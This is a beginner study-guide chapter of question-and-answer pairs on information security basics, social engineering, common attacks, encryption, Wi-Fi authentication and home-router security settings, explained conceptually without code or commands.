CHAPTER SIXTEEN: SOHO CONFIGURATION

Question 1

What is Information Security?

Answer 1

Information security is all about protecting data — whether it’s on a computer, a phone, or printed on paper — from people who shouldn’t see it, change it, or destroy it.

To keep data safe, security focuses on three main goals, known as the CIA Triad:

1. Confidentiality – Only the right people should be able to see the data.
2. Integrity – The data should be accurate and not messed with unless it’s allowed.
3. Availability – The data should be accessible to the people who are supposed to have access when they need it.

Question 2

What is Cybersecurity?

Answer 2

Cybersecurity is like a special branch of information security that focuses on protecting computers, networks, and digital data from attacks — like hackers trying to get in.

Question 3

How Do We Protect Systems?

Answer 3

We use security policies (rules) and controls (tools/settings) to protect systems. Making a system more secure is called hardening it — kind of like putting armor on it.

But to know how secure a system is, we do security assessments. These look for:

Vulnerabilities – Weak spots in the system (like unlocked doors).

Threats – Things or people that might take advantage of those weak spots (like hackers).

Risks – The chance that a threat will successfully exploit a vulnerability and what damage it could cause.

Question 4

What Are Vulnerabilities?

Answer 4

A vulnerability is any weakness that a hacker (or even an accident) could use to break into a system. Examples include:

Badly installed software

Question 5

What is a Non-Compliant System?

Answer 5

A configuration baseline is like a checklist for how a system should be securely set up.

A non-compliant system is one that no longer follows that secure checklist — it’s drifted from what’s considered safe. We use vulnerability scanners (tools that scan systems) to catch these.

Question 6

What Are Unprotected Systems?

Answer 6

An unprotected system is missing some important security settings or tools. This means it has a bigger attack surface — more ways for hackers to get in.

Question 7

What Are Software and Zero-Day Vulnerabilities?

Answer 7

A software vulnerability is a coding mistake that could let hackers crash the system or run their own code on it.

An exploit is the tool or method that takes advantage of that flaw.

A zero-day vulnerability is a brand-new flaw that the software maker doesn’t even know about yet. Hackers can use it before anyone has time to fix it — very dangerous!

Question 8

What About Unpatched or End-of-Life Systems?

Answer 8

An unpatched system is one that hasn’t had the latest updates or security fixes.

An end-of-life (EOL) system is so old the company that made it no longer supports or fixes it.

Question 9

What is BYOD and Why is it Risky?

Answer 9

Bring Your Own Device (BYOD) means employees use their personal phones or laptops at work. It’s convenient, but super hard to keep secure:

So many different devices and versions
Harder for IT to control
Makes the attack surface bigger

Question 10

What is Social Engineering?

Answer 10

Social engineering is when hackers trick people into giving up private information. Instead of hacking a computer, they “hack” the human.

Question 11

Dumpster Diving

Answer 11

Hackers can go through trash to find helpful info like:

Names, job titles
Internal phone numbers
Old documents or USB drives

This helps them seem more legit when impersonating someone.

Question 12

Shoulder Surfing

Answer 12

This is when a hacker watches someone type their password. It doesn’t have to be literally over the shoulder — they could use binoculars or cameras too.

Question 13

Tailgating

Answer 13

Imagine someone walks through a secure door with a key card, and you slip in right behind them before the door closes. That’s tailgating — you’re sneaking in without being allowed.

Question 14

Piggybacking

Answer 14

Similar to tailgating, but here, you ask someone to let you in. Maybe you pretend to be a janitor and say, “Can you hold the door while I bring in my cleaning cart?” — and they do. That’s piggybacking.

Question 15

Phishing

Answer 15

Phishing messages pretend to be from trusted sources (like your bank or IT department). They might ask you to:

Click a link to a fake website.

Download a fake antivirus that’s actually malware.

Let someone “fix” your computer remotely, but they’re actually breaking in.

Question 16

Types of phishing

Answer 16

Spear Phishing: Targeted. They know something about you — your name, job, or what you’re working on — to make it more convincing.

Whaling: Phishing aimed at top bosses (like CEOs) — the “big fish.”

Vishing: Phishing done by voice, like someone calling and pretending to be your bank, asking for your PIN.

Question 17

Evil Twin

Answer 17

This is like phishing, but instead of using email, the attacker sets up a fake Wi-Fi network.

It might look like a legit network (like “Starbucks_WiFi”), but it’s fake.

When you connect, it might take you to a fake login page to steal your password.

They can even knock out the real Wi-Fi so you’re forced to connect to theirs.

Question 18

Static Threats and Modern Threats

Answer 18

These are old-school viruses or malware that leave behind a “signature” or pattern. Antivirus software could easily detect them.
But attackers got smarter.

Modern threats are sneakier — they behave in ways that can’t be detected by looking for simple patterns. So now we study the behavior of the attack instead.

Question 19

External vs. Internal Threats

Answer 19

External Threat Actor: Someone outside your organization — a hacker from the internet or someone breaking in physically.

Internal Threat Actor: Someone inside your organization — like an employee or contractor.
They might be malicious (on purpose) or non-malicious (made a dumb mistake).

Question 20

Footprinting

Answer 20

This is the hacker doing recon (like a spy) — collecting info about your systems before attacking.

They might scan your website, ports, or search for leaked info to figure out how to break in.

Question 21

Spoofing

Answer 21

Spoofing means pretending to be something or someone you’re not — kind of like wearing a mask.

It could mean faking an email address, IP address, or even a digital certificate (used to prove websites are secure).

If a hacker steals your token (a small bit of info that says you’re logged in), they might reuse it — this is called a replay attack.

Question 22

On-Path Attacks (a.k.a. Man-in-the-Middle)

Answer 22

This is when a hacker secretly sits in the middle of two computers talking to each other.

They can see the data and maybe even change it without you knowing.

Evil Twin Wi-Fi is one example — it sits between you and the real internet.

Question 23

Denial of Service (DoS) Attacks

Answer 23

These attacks flood a website or service with junk so it crashes or slows down.

Could be digital (sending tons of fake traffic) or physical (like cutting power).

Sometimes done just to cause trouble, or to distract security while the real attack happens elsewhere.

Question 24

Distributed DoS (DDoS) and Botnets

Answer 24

A DDoS attack comes from lots of hacked devices at once — not just one.

These devices (could be hacked computers, webcams, etc.) form a botnet.

The hacker controls all these devices from a command & control center and launches massive attacks.

Question 25

On-Path and Malware Attacks

Answer 25

On-path attack (also known as "man-in-the-middle"): A hacker secretly sits between you and a website, watching or even changing your messages. Malware: Bad software (like viruses) installed on your computer to steal info like passwords.

Question 26

Cryptographic Hash

Answer 26

Instead of saving your actual password, systems usually transform it into a code (called a hash) that can’t be turned back into the original. It’s like turning your password into a smoothie. You can’t get the fruit back out. Even the system admin doesn’t know your real password.

Question 27

Password Cracking

Answer 27

Hackers try to guess your password from the hash using tools. There are two main ways: Dictionary Attack: The tool tries common words or phrases (like "password123" or your pet's name). Brute Force Attack: It tries every possible combo (like a robot going "aaaa", "aaab", "aaac"...). Simple passwords are cracked in minutes. Complex ones take longer.

Question 28

Cross-Site Scripting (XSS) Attacks

Answer 28

When websites don’t properly check what users type in, hackers can sneak in scripts (tiny programs) that do bad things. Websites run code on both the server side (where the website lives) and client side (your browser). If a website lets you type in your name and you instead enter a tiny bit of code, that code might run and steal data. Example: A hacker puts a hidden script in a form like a login box. When others visit the site, the script secretly runs and sends the victim’s data to the hacker.

Question 29

SQL Injection Attacks

Answer 29

Websites often talk to databases using a language called SQL to get or change information. SQL Injection is when a hacker types sneaky SQL commands into a website’s input box. If the website doesn’t check properly, those commands get sent to the database. Example: Instead of typing a name, the hacker types in something that tricks the database into giving up data like usernames and passwords.

Question 30

Cryptographic Hashes

Answer 30

A hash turns any data into a fixed-size string (a short code). Cryptographic hash = a special one-way version. You can make the hash from your data, but you can’t get the original data back from it. Great for storing passwords: even if hackers get the hash, they can’t turn it back into your password (hopefully).

Question 31

two types of Cryptographic Hashes

Answer 31

SHA (Secure Hash Algorithm) – stronger, still used. MD5 (Message Digest 5) – older, not very safe anymore.

Question 32

Symmetric Encryption

Answer 32

This is the basic type of encryption: One secret key does both the locking (encrypting) and unlocking (decrypting) of the data. The problem? You have to safely share the key with the other person, which is hard. It’s fast, so it's used for encrypting big chunks of data. Example: AES (Advanced Encryption Standard) is a popular and strong one.

Question 33

Asymmetric Encryption

Answer 33

Now we get fancy. There are two keys: a public key (you can share it) and a private key (keep it secret). If someone locks a message using your public key, only your private key can unlock it. Why it’s cool: You don’t need to send your secret key around. You can safely talk to strangers on the internet!

Question 34

Key Exchange

Answer 34

Why bother? Because symmetric encryption is fast, but you can’t safely send the key. Asymmetric encryption is safe but slow. So here’s the trick: You use the receiver’s public key to send them a secret key (for symmetric encryption). Only they can open it with their private key. Now you both have the same secret key — and can talk quickly and safely using symmetric encryption. That secret key is called a session key. If it’s changed regularly, it’s called an ephemeral key.

Question 35

WPA (Version 1)

Answer 35

Came after WEP, which was super weak. Still used a weak encryption method called RC4 (a cipher that scrambles your data). To make it better than WEP, WPA added something called TKIP (Temporal Key Integrity Protocol). TKIP changes the encryption key frequently so hackers can’t just crack one key and use it forever. But even with TKIP, WPA still had security issues, like replay attacks (where a hacker captures and reuses your data to trick the network).

Question 36

WPA2

Answer 36

A big upgrade over WPA. Replaces RC4 + TKIP with AES + CCMP. AES = a very strong encryption algorithm (used by governments). CCMP = handles both encrypting your data and making sure it hasn’t been messed with. Much harder for hackers to break in or replay old messages.

Question 37

WPA3

Answer 37

Even WPA2 has known weaknesses, so we now have WPA3. It brings: SAE (Simultaneous Authentication of Equals) instead of the old 4-way handshake. - The old 4-way handshake could be tricked by attackers into giving up the key. - SAE makes this much harder by using stronger cryptography during login. Stronger encryption: Instead of just AES, it uses a newer method called AES-GCMP. Protected Management Frames: These are the control messages Wi-Fi devices send each other when joining or leaving the network. WPA3 encrypts them to stop spoofing or forced disconnects. Wi-Fi Enhanced Open: Even if a Wi-Fi has no password, WPA3 still encrypts the data, so strangers nearby can’t read it.

Question 38

Wi-Fi Authentication Methods

Answer 38

Authentication = proving who you are before you're allowed on the network. 1. Open Authentication No password at all — not secure. 2. Personal Authentication Used in homes or small businesses.

Question 39

WPA2-PSK (Pre-Shared Key)

Answer 39

Everyone uses the same password (passphrase). This password turns into a long random-looking key (called PMK, or Pairwise Master Key). PMK is used in a 4-way handshake to create session keys for encryption. If the password is weak, attackers can crack it.

Question 40

WPA3-Personal (with SAE)

Answer 40

Still uses a shared passphrase, but: Instead of the vulnerable 4-way handshake, it uses SAE, which is much safer against password guessing.

Question 41

Enterprise Authentication

Answer 41

Used in offices and large organizations. Instead of one password for everyone, each user has their own credentials. Uses 802.1X, which works with a system called EAP (Extensible Authentication Protocol). The access point just passes login info to a AAA server (Authentication, Authorization, Accounting). Think of the AAA server like a security guard who checks your ID. Once approved, the server and device generate encryption keys without the AP needing to know any passwords. Much more secure, especially if you use: EAP-TLS (Transport Layer Security)

Question 42

RADIUS (Remote Authentication Dial-In User Service)

Answer 42

Think of RADIUS like a security guard at the door. It checks your ID (your username/password), but it doesn’t keep the list itself—it asks the boss (the AAA server) whether you're allowed in. Your Wi-Fi access point (like the router) is set up as a client to the RADIUS server. When you try to connect, the router doesn't check your password—it passes it to the RADIUS server. They trust each other because they share a secret password (called a shared secret).

Question 43

TACACS+ (Terminal Access Controller Access-Control System Plus)

Answer 43

TACACS+ is another way to do the same job but with some differences: It's often used to control access to admin panels on routers, switches, and other hardware. It was created by Cisco but works with other brands too. Compared to RADIUS, it gives more control over what people can do once they’re logged in.

Question 44

Kerberos

Answer 44

Kerberos is like a super smart bouncer used in Windows networks: It lets you log in once (called Single Sign-On or SSO) and then access multiple systems without having to log in again and again. It gives out authorization tickets—kind of like wristbands at a concert—that say what areas you're allowed into. Most Wi-Fi routers don’t talk to Kerberos directly. Instead, they work with RADIUS or TACACS+ to handle login info securely.

Question 45

Firmware Updates

Answer 45

Your router has software inside it (called firmware) that sometimes needs to be updated. This helps fix bugs and adds better security, like WPA3 (a newer Wi-Fi protection standard). Download the update from the manufacturer’s website and upload it through the router’s control panel.

Question 46

Encryption Settings (Wi-Fi Password Protection)

Answer 46

Encryption is like a secret code that protects your Wi-Fi. The best one right now is WPA3. If your phone or laptop doesn’t support WPA3, you can enable compatibility for WPA2, but this weakens the protection a bit. WPA2 (AES/CCMP) is better than WPA2 (TKIP) — TKIP is old and less secure. Choose a strong passphrase (your Wi-Fi password). This is used to generate the key that locks your network.

Question 47

Content Filtering

Answer 47

Think of it like parental controls for your Wi-Fi. Your router uses blacklists (blocked sites) and reputation databases (bad sites) to block dangerous or inappropriate content. You can block certain keywords, websites, or even set time limits for Internet use.

Question 48

What is Port Forwarding?

Answer 48

Every device has ports — like doors for internet traffic. Port forwarding is like telling your router, “Hey, if someone knocks on this door, send them to this device inside.” For example: Hosting a Minecraft server? Open port 25565 so friends can connect.

Question 49

Static IP & DHCP Reservation

Answer 49

Devices usually get a random address from your router (called DHCP), but this changes. For port forwarding to work reliably, you need the device to keep the same address. You can do this with a DHCP reservation (like reserving a hotel room) using the device’s MAC address (its unique ID).

Question 50

Port Triggering

Answer 50

This is for more complex apps that use multiple ports (like FTP for file sharing). When your device reaches out to a server, the router opens a path for that server to respond.

Question 51

UPnP (Universal Plug-and-Play)

Answer 51

UPnP is a feature where your Xbox, PlayStation, or Zoom app tells the router, “Hey, open this port for me.” It’s super convenient but can be dangerous because it automatically opens doors. Best advice: Disable UPnP unless you really need it, and never allow it from the outside internet.

Question 52

Equipment Locks

Answer 52

Kensington lock: A cable that locks your laptop to your desk. Chassis locks: Lock a computer case so no one can open it and steal parts. Rack cabinets: Secure network gear in metal cages.

Question 53

Surveillance & Alarms

Answer 53

Circuit alarms: Trip when something is opened. Motion sensors: Detect movement. Proximity alarms: Trigger when someone gets close. Duress alarms: Used in emergencies to silently call for help.